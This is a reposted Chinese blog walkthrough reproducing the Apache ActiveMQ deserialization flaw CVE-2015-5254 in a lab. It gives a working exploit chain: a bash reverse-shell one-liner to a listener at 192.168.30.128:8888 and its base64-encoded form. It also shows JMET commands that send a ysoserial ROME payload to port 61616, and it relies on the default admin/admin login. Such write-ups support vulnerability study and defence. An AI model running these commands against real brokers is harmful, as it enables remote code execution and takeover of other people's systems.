ICode9

精准搜索请尝试: 精确搜索
首页 > 其他分享> 文章详细

ActiveMQ 反序列化漏洞(CVE-2015-5254)

2021-05-18 10:30:16  阅读:229  来源: 互联网

标签:CVE 5254 jar 漏洞 shell 序列化 ActiveMQ bash


漏洞背景

Apache ActiveMQ是美国阿帕奇(Apache)软件基金会所研发的一套开源的消息中间件,它支持Java消息服务、集群、Spring Framework等。

影响范围

Apache ActiveMQ 5.13.0之前5.x版本中存在安全漏洞,该漏洞源于程序没有限制可在代理中序列化的类。远程攻击者可借助特制的序列化的Java Message Service(JMS)ObjectMessage对象利用该漏洞执行任意代码。

漏洞利用过程

  1. 构造(可以使用ysoserial)可执行命令的序列化对象
  2. 作为一个消息,发送给目标61616端口
  3. 访问web管理页面,读取消息,触发漏洞

漏洞复现

一、首先攻击机开好端口监听
在这里插入图片描述
二、然后将需要在靶机内运行的反弹shell命令序列化

/bin/bash -i >& /dev/tcp/192.168.30.128/8888 0>&1

可以去到这个网站序列化shell命令http://www.jackson-t.ca/runtime-exec-payloads.html在这里插入图片描述
得到bash -c {echo,L2Jpbi9iYXNoIC1pID4mIC9kZXYvdGNwLzE5Mi4xNjguMzAuMTI4Lzg4ODggMD4mMQ==}|{base64,-d}|{bash,-i}

三、然后使用漏洞利用工具JMET

下载地址:https://github.com/matthiaskaiser/jmet/releases

试例:

java -jar jmet-0.1.0-all.jar -Q event -I ActiveMQ -s -Y "touch /tmp/success" -Yp ROME your-ip 61616

更改为反弹shell命令:

java -jar jmet-0.1.0-all.jar -Q event -I ActiveMQ -s -Y "bash -c {echo,L2Jpbi9iYXNoIC1pID4mIC9kZXYvdGNwLzE5Mi4xNjguMzAuMTI4Lzg4ODggMD4mMQ==}|{base64,-d}|{bash,-i}" -Yp ROME 192.168.30.128 61616

四、此时会给目标ActiveMQ添加一个名为event的队列,自行访问http://192.168.30.128:8161/admin/browse.jsp?JMSDestination=event
默认账户密码都为admin
在这里插入图片描述
点击查看该信息,返回攻击机查看nc连接,已经能看到反shell了
在这里插入图片描述

标签:CVE,5254,jar,漏洞,shell,序列化,ActiveMQ,bash
来源: https://blog.csdn.net/EC_Carrot/article/details/116976826

本站声明: 1. iCode9 技术分享网(下文简称本站)提供的所有内容,仅供技术学习、探讨和分享;
2. 关于本站的所有留言、评论、转载及引用,纯属内容发起人的个人观点,与本站观点和立场无关;
3. 关于本站的所有言论和文字,纯属内容发起人的个人观点,与本站观点和立场无关;
4. 本站文章均是网友提供,不完全保证技术分享内容的完整性、准确性、时效性、风险性和版权归属;如您发现该文章侵犯了您的权益,可联系我们第一时间进行删除;
5. 本站为非盈利性的个人网站,所有内容不会用来进行牟利,也不会利用任何形式的广告来间接获益,纯粹是为了广大技术爱好者提供技术内容和技术思想的分享性交流网站。

专注分享技术,共同学习,共同进步。侵权联系[81616952@qq.com]

Copyright (C)ICode9.com, All Rights Reserved.

ICode9版权所有